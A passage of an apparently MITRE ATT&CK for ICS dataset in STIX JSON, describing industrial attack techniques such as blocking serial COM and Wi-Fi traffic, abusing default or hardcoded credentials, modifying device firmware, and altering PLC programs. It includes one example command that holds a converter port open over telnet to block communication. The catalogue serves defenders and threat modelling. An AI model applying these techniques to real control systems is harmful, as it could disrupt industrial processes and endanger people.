                    "description": "Adversaries may block access to serial COM to prevent instructions or configurations from reaching target devices. Serial Communication ports (COM) allow communication with control system devices. Devices can receive command and configuration messages over such serial COM. Devices also use serial COM to send command and reporting messages. Blocking device serial COM may also block command messages and block reporting messages.\n\nA serial to Ethernet converter is often connected to a serial COM to facilitate communication between serial and Ethernet devices. One approach to blocking a serial COM would be to create and hold open a TCP session with the Ethernet side of the converter. A serial to Ethernet converter may have a few ports open to facilitate multiple communications. For example, if there are three serial COM available -- 1, 2 and 3 --, the converter might be listening on the corresponding ports 20001, 20002, and 20003. If a TCP/IP connection is opened with one of these ports and held open, then the port will be unavailable for use by another party. One way the adversary could achieve this would be to initiate a TCP session with the serial to Ethernet converter at 10.0.0.1 via Telnet on serial port 1 with the following command: telnet 10.0.0.1 20001.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-ics-attack",
                            "phase_name": "inhibit-response-function"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1695/001",
                            "external_id": "T1695.001"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--71f2d49e-65dd-4fb6-a4cc-0d2b19d427fa",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-20 20:54:23.383000+00:00",
                    "modified": "2026-04-23 19:59:42.404000+00:00",
                    "name": "Wi-Fi",
                    "description": "Adversaries may block access to Wi-Fi communications to prevent messages from reaching target systems and devices. Wi-Fi connections allow for communications between IT and OT systems and devices. Blocking Wi-Fi communications may also block command and reporting messages.(Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011)\n\nAn adversary may block Wi-Fi communications by disabling network interfaces, [Service Stop](https://attack.mitre.org/techniques/T0881), conducting an [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T0830) attack and dropping the network traffic, or by jamming the Wi-Fi signal.\n",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-ics-attack",
                            "phase_name": "inhibit-response-function"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1695/003",
                            "external_id": "T1695.003"
                        },
                        {
                            "source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011",
                            "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12 ",
                            "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--338f4364-2269-4f70-9079-b20384b16628",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-20 20:50:34.107000+00:00",
                    "modified": "2026-04-23 18:49:15.673000+00:00",
                    "name": "Block Operational Technology Message",
                    "description": "Adversaries may block messages between systems and devices in an OT/ICS environment to disrupt processes. Messages typically fall into two categories: (1) reporting messages that contain telemetry data about the current state of systems, devices, and processes and (2) command messages that contain instructions to control systems, devices, and processes. Both types of messages are critical for the proper functioning of industrial control processes and failure of the messages to reach their intended destinations could inhibit response functions or create an unsafe condition that could have physical impacts.(Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011)(Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016)\n\nAdversaries may block communications by either making modifications to software ([System Firmware](https://attack.mitre.org/techniques/T0857), [Module Firmware](https://attack.mitre.org/techniques/T0839), [Hooking](https://attack.mitre.org/techniques/T0874), and [Rootkit](https://attack.mitre.org/techniques/T0851)) and services ([Service Stop](https://attack.mitre.org/techniques/T0881), [Denial of Service](https://attack.mitre.org/techniques/T0814)) on systems and devices or by positioning themselves between systems and devices and intercepting and blocking the communications such as the case with an [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T0830) attack.\n",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-ics-attack",
                            "phase_name": "inhibit-response-function"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1691",
                            "external_id": "T1691"
                        },
                        {
                            "source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011",
                            "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12 ",
                            "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258"
                        },
                        {
                            "source_name": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016",
                            "description": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems 2016, March 18 Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case Retrieved. 2018/03/27 ",
                            "url": "https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt6a77276749b76a40/607f235992f0063e5c070fff/E-ISAC_SANS_Ukraine_DUC_5%5b73%5d.pdf"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--15ca2a99-2d3e-457f-b1d7-c52a1d5849c9",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-20 20:54:16.029000+00:00",
                    "modified": "2026-04-23 18:50:42.389000+00:00",
                    "name": "Command Message",
                    "description": "Adversaries may block a command message from reaching its intended target to prevent command execution. In OT networks, command messages are sent to provide instructions to control system devices. A blocked command message can inhibit response functions from correcting a disruption or unsafe condition.(Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011)(Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-ics-attack",
                            "phase_name": "inhibit-response-function"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1691/001",
                            "external_id": "T1691.001"
                        },
                        {
                            "source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011",
                            "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12 ",
                            "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258"
                        },
                        {
                            "source_name": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016",
                            "description": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems 2016, March 18 Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case Retrieved. 2018/03/27 ",
                            "url": "https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt6a77276749b76a40/607f235992f0063e5c070fff/E-ISAC_SANS_Ukraine_DUC_5%5b73%5d.pdf"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--7866bb5f-98ee-45c2-984c-8a328c5176b2",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-20 20:54:16.584000+00:00",
                    "modified": "2026-04-23 18:52:34.062000+00:00",
                    "name": "Reporting Message",
                    "description": "Adversaries may block or prevent a reporting message from reaching its intended target. In control systems, reporting messages contain telemetry data (e.g., I/O values) pertaining to the current state of equipment and the industrial process. By blocking these reporting messages, an adversary can potentially hide their actions from an operator.\n\nBlocking reporting messages in control systems that manage physical processes may contribute to system impact, causing inhibition of a response function. A control system may not be able to respond in a proper or timely manner to an event, such as a dangerous fault, if its corresponding reporting message is blocked.(Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011)(Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-ics-attack",
                            "phase_name": "inhibit-response-function"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1691/002",
                            "external_id": "T1691.002"
                        },
                        {
                            "source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011",
                            "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12 ",
                            "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258"
                        },
                        {
                            "source_name": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016",
                            "description": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems 2016, March 18 Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case Retrieved. 2018/03/27 ",
                            "url": "https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt6a77276749b76a40/607f235992f0063e5c070fff/E-ISAC_SANS_Ukraine_DUC_5%5b73%5d.pdf"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--3e9b182e-e493-49e1-9a9b-bd0dfcd34a7c",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-20 20:50:35.222000+00:00",
                    "modified": "2026-04-23 19:29:41.601000+00:00",
                    "name": "Insecure Credentials",
                    "description": "Adversaries may target insecure credentials as a means to persist on a system or device or move laterally from one system or device to another. Insecure credentials may appear as default credentials which are pre-configured credentials on a system, device, or software that are well-known in documentation or hard-coded credentials which are built into the system, device, or software that cannot be changed or not easily changed because of the impact on control processes.(Citation: NIST SP 800-82r3)(Citation: ICS-ALERT-13-164-01)(Citation: OT IceFall)\n Adversaries often times use insecure credentials to evade detection as they are typically forgotten about by system and device owners.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-ics-attack",
                            "phase_name": "persistence"
                        },
                        {
                            "kill_chain_name": "mitre-ics-attack",
                            "phase_name": "lateral-movement"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1694",
                            "external_id": "T1694"
                        },
                        {
                            "source_name": "ICS-ALERT-13-164-01",
                            "description": "Cybersecurity and Infrastructure Security Agency (CISA). (2013, October 29). Medical Devices Hard-Coded Passwords. Retrieved April 23, 2026.",
                            "url": "https://www.cisa.gov/news-events/ics-alerts/ics-alert-13-164-01"
                        },
                        {
                            "source_name": "OT IceFall",
                            "description": "Forescout Vedere Labs. (2022, June). OT: IceFall Report. Retrieved April 23, 2026.",
                            "url": "https://www.forescout.com/resources/ot-icefall-report/"
                        },
                        {
                            "source_name": "NIST SP 800-82r3",
                            "description": "Keith Stouffer. (2023, September). Guide to Operational Technology  (OT) Security. Retrieved April 22, 2026.",
                            "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r3.pdf"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--5658ad88-7510-490e-a351-95d50b1bcd91",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-20 20:54:19.020000+00:00",
                    "modified": "2026-04-23 19:30:36.158000+00:00",
                    "name": "Default Credentials",
                    "description": "Adversaries may leverage manufacturer or supplier set default credentials on control system devices. These default credentials may have administrative permissions and may be necessary for initial configuration of the device. It is general best practice to change the passwords for these accounts as soon as possible, but some manufacturers may have devices that have passwords or usernames that cannot be changed.(Citation: Keith Stouffer May 2015)\n\nDefault credentials are normally documented in an instruction manual that is either packaged with the device, published online through official means, or published online through unofficial means. Adversaries may leverage default credentials that have not been properly modified or disabled.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-ics-attack",
                            "phase_name": "persistence"
                        },
                        {
                            "kill_chain_name": "mitre-ics-attack",
                            "phase_name": "lateral-movement"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1694/001",
                            "external_id": "T1694.001"
                        },
                        {
                            "source_name": "Keith Stouffer May 2015",
                            "description": "Keith Stouffer 2015, May Guide to Industrial Control Systems (ICS) Security Retrieved. 2018/03/28 ",
                            "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--6b335943-c3af-430e-a135-ab09623bdc20",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-20 20:54:19.528000+00:00",
                    "modified": "2026-04-23 19:32:38.851000+00:00",
                    "name": "Hardcoded Credentials",
                    "description": "Adversaries may leverage credentials that are hardcoded in software or firmware to gain an unauthorized interactive user session to an asset. Examples credentials that may be hardcoded in an asset include:\n\n* Username/Passwords\n* Cryptographic keys/Certificates\n* API tokens\n\nUnlike [Default Credentials](https://attack.mitre.org/techniques/T0812), these credentials are built into the system in a way that they either cannot be changed by the asset owner, or may be infeasible to change because of the impact it would cause to the control system operation. These credentials may be reused across whole product lines or device models and are often not published or known to the owner and operators of the asset.(Citation: ICS-ALERT-13-164-01)(Citation: OT IceFall)\n\nAdversaries may utilize these hardcoded credentials to move throughout the control system environment or provide reliable access for their tools to interact with industrial assets.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-ics-attack",
                            "phase_name": "persistence"
                        },
                        {
                            "kill_chain_name": "mitre-ics-attack",
                            "phase_name": "lateral-movement"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1694/002",
                            "external_id": "T1694.002"
                        },
                        {
                            "source_name": "ICS-ALERT-13-164-01",
                            "description": "Cybersecurity and Infrastructure Security Agency (CISA). (2013, October 29). Medical Devices Hard-Coded Passwords. Retrieved April 23, 2026.",
                            "url": "https://www.cisa.gov/news-events/ics-alerts/ics-alert-13-164-01"
                        },
                        {
                            "source_name": "OT IceFall",
                            "description": "Forescout Vedere Labs. (2022, June). OT: IceFall Report. Retrieved April 23, 2026.",
                            "url": "https://www.forescout.com/resources/ot-icefall-report/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--7b4c0e19-a9b0-4a74-a196-b38c07b79f20",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-20 20:50:34.850000+00:00",
                    "modified": "2026-04-23 19:06:21.253000+00:00",
                    "name": "Modify Firmware",
                    "description": "Firmware is low-level software embedded in hardware that enables systems and devices to function properly and is commonly found in ICS environments. Adversaries may modify firmware on a system or device by installing malicious or vulnerable versions that enable them to achieve objectives such as [Persistence](https://attack.mitre.org/tactics/TA0110), [Impair Process Control](https://attack.mitre.org/tactics/TA0106), and [Inhibit Response Function](https://attack.mitre.org/tactics/TA0107). \n\nAdversaries may modify system and device firmware by using the built-in firmware update functionality which may support local or remote installation. The malicious or vulnerable firmware may be delivered via [Replication Through Removable Media](https://attack.mitre.org/techniques/T0847), [Supply Chain Compromise](https://attack.mitre.org/techniques/T0862), or [Remote Services](https://attack.mitre.org/techniques/T0886). Once installed, the malicious or vulnerable firmware could be used to provide [Rootkit](https://attack.mitre.org/techniques/T0851) and [Hooking](https://attack.mitre.org/techniques/T0874) functionality, [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T0890), or [Denial of Service](https://attack.mitre.org/techniques/T0814).(Citation: Basnight, Zachry, et al.)\n",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-ics-attack",
                            "phase_name": "persistence"
                        },
                        {
                            "kill_chain_name": "mitre-ics-attack",
                            "phase_name": "inhibit-response-function"
                        },
                        {
                            "kill_chain_name": "mitre-ics-attack",
                            "phase_name": "impair-process-control"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1693",
                            "external_id": "T1693"
                        },
                        {
                            "source_name": "Basnight, Zachry, et al.",
                            "description": "Basnight, Zachry, et al. 2013 Retrieved. 2017/10/17 ",
                            "url": "http://www.sciencedirect.com/science/article/pii/S1874548213000231"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--75587e49-ab7e-44df-9549-faeb1da57f39",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-20 20:54:18.535000+00:00",
                    "modified": "2026-04-23 19:15:57.683000+00:00",
                    "name": "Module Firmware",
                    "description": "Adversaries may install malicious or vulnerable firmware onto modular hardware devices. Control system devices often contain modular hardware devices. These devices may have their own set of firmware that is separate from the firmware of the main control system equipment.\n\nThis technique is similar to System Firmware, but is conducted on other system components that may not have the same capabilities or level of integrity checking. Although it results in a device re-image, malicious device firmware may provide persistent access to remaining devices.(Citation: Daniel Peck,  Dale Peterson January 2009)\n\nAn easy point of access for an adversary is the Ethernet card, which may have its own CPU, RAM, and operating system. The adversary may attack and likely exploit the computer on an Ethernet card. Exploitation of the Ethernet card computer may enable the adversary to accomplish additional attacks, such as the following:(Citation: Daniel Peck,  Dale Peterson January 2009)\n\n* Delayed Attack - The adversary may stage an attack in advance and choose when to launch it, such as at a particularly damaging time.\n* Brick the Ethernet Card - Malicious firmware may be programmed to result in an Ethernet card failure, requiring a factory return.\n* Random Attack or Failure - The adversary may load malicious firmware onto multiple field devices. Execution of an attack and the time it occurs is generated by a pseudo-random number generator.\n* A Field Device Worm - The adversary may choose to identify all field devices of the same model, with the end goal of performing a device-wide compromise.\n* Attack Other Cards on the Field Device - Although it is not the most important module in a field device, the Ethernet card is most accessible to the adversary and malware. Compromise of the Ethernet card may provide a more direct route to compromising other modules, such as the CPU module.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-ics-attack",
                            "phase_name": "persistence"
                        },
                        {
                            "kill_chain_name": "mitre-ics-attack",
                            "phase_name": "inhibit-response-function"
                        },
                        {
                            "kill_chain_name": "mitre-ics-attack",
                            "phase_name": "impair-process-control"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1693/002",
                            "external_id": "T1693.002"
                        },
                        {
                            "source_name": "Daniel Peck,  Dale Peterson January 2009",
                            "description": "Daniel Peck,  Dale Peterson 2009, January 28 Leveraging Ethernet Card Vulnerabilities in Field Devices Retrieved. 2017/12/19 ",
                            "url": "https://www.researchgate.net/publication/228849043_Leveraging_ethernet_card_vulnerabilities_in_field_devices"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--68a9324d-a524-4766-a899-a026f68a33df",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-20 20:54:18.031000+00:00",
                    "modified": "2026-04-23 19:10:31.871000+00:00",
                    "name": "System Firmware",
                    "description": "System firmware on modern assets is often designed with an update feature. Older device firmware may be factory installed and require special reprograming equipment. When available, the firmware update feature enables vendors to remotely patch bugs and perform upgrades. Device firmware updates are often delegated to the user and may be done using a software update package. It may also be possible to perform this task over the network.\n\nAn adversary may exploit the firmware update feature on accessible devices to upload malicious or out-of-date firmware. Malicious modification of device firmware may provide an adversary with root access to a device, given firmware is one of the lowest programming abstraction layers.(Citation: Basnight, Zachry, et al.)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-ics-attack",
                            "phase_name": "persistence"
                        },
                        {
                            "kill_chain_name": "mitre-ics-attack",
                            "phase_name": "inhibit-response-function"
                        },
                        {
                            "kill_chain_name": "mitre-ics-attack",
                            "phase_name": "impair-process-control"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1693/001",
                            "external_id": "T1693.001"
                        },
                        {
                            "source_name": "Basnight, Zachry, et al.",
                            "description": "Basnight, Zachry, et al. 2013 Retrieved. 2017/10/17 ",
                            "url": "http://www.sciencedirect.com/science/article/pii/S1874548213000231"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--77015a55-eef8-4f71-a071-b152f82ec1ef",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-20 20:54:23.982000+00:00",
                    "modified": "2026-04-23 00:01:28.898000+00:00",
                    "name": "Download All",
                    "description": "Adversaries may execute a full program download to a PLC to overwrite the entire PLC program and configuration to deploy a new project or make major changes. This typically requires stopping the PLC and adversely impacting control processes.\n\nThe ability to perform a full program download to the PLC typically relies on access to a workstation with the vendor-specific PLC programming software installed.\n",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-ics-attack",
                            "phase_name": "lateral-movement"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T0843/001",
                            "external_id": "T0843.001"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--d85a6ee9-820c-4adf-8a64-2392ee70c83c",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-20 20:54:25.372000+00:00",
                    "modified": "2026-04-23 17:40:18.368000+00:00",
                    "name": "Online Edit",
                    "description": "Adversaries may execute an online edit of a PLC to update parts of an existing program. It does not require stopping the PLC which allows it to continue running during transfer and reconfiguration without interruption to process control. Adversaries may leverage this approach to minimize downtime and evade detection. \n\nThe ability to perform an online edit to the PLC typically relies on access to a workstation with the vendor-specific PLC programming software installed.\n",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-ics-attack",
                            "phase_name": "lateral-movement"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T0843/002",
                            "external_id": "T0843.002"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--574d5bfb-9a7a-4b28-ab5c-743ac704c135",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-20 20:54:25.997000+00:00",
                    "modified": "2026-04-23 00:18:49.737000+00:00",
                    "name": "Program Append",
                    "description": "Adversaries may execute a program append to a PLC to update parts of an existing program. It may or may not require stopping the PLC which may allow it to continue running during transfer and reconfiguration without interruption to process control. Adversaries may leverage this approach to minimize downtime and evade detection. \n\nThe ability to perform a program append to the PLC typically relies on access to a workstation with the vendor-specific PLC programming software installed.\n",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-ics-attack",
                            "phase_name": "lateral-movement"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T0843/003",
                            "external_id": "T0843.003"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--354ca909-b54d-4c41-b597-9c296b344a43",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-20 20:54:20.103000+00:00",
                    "modified": "2026-04-23 19:37:43.545000+00:00",
                    "name": "Siemens Project File Format",
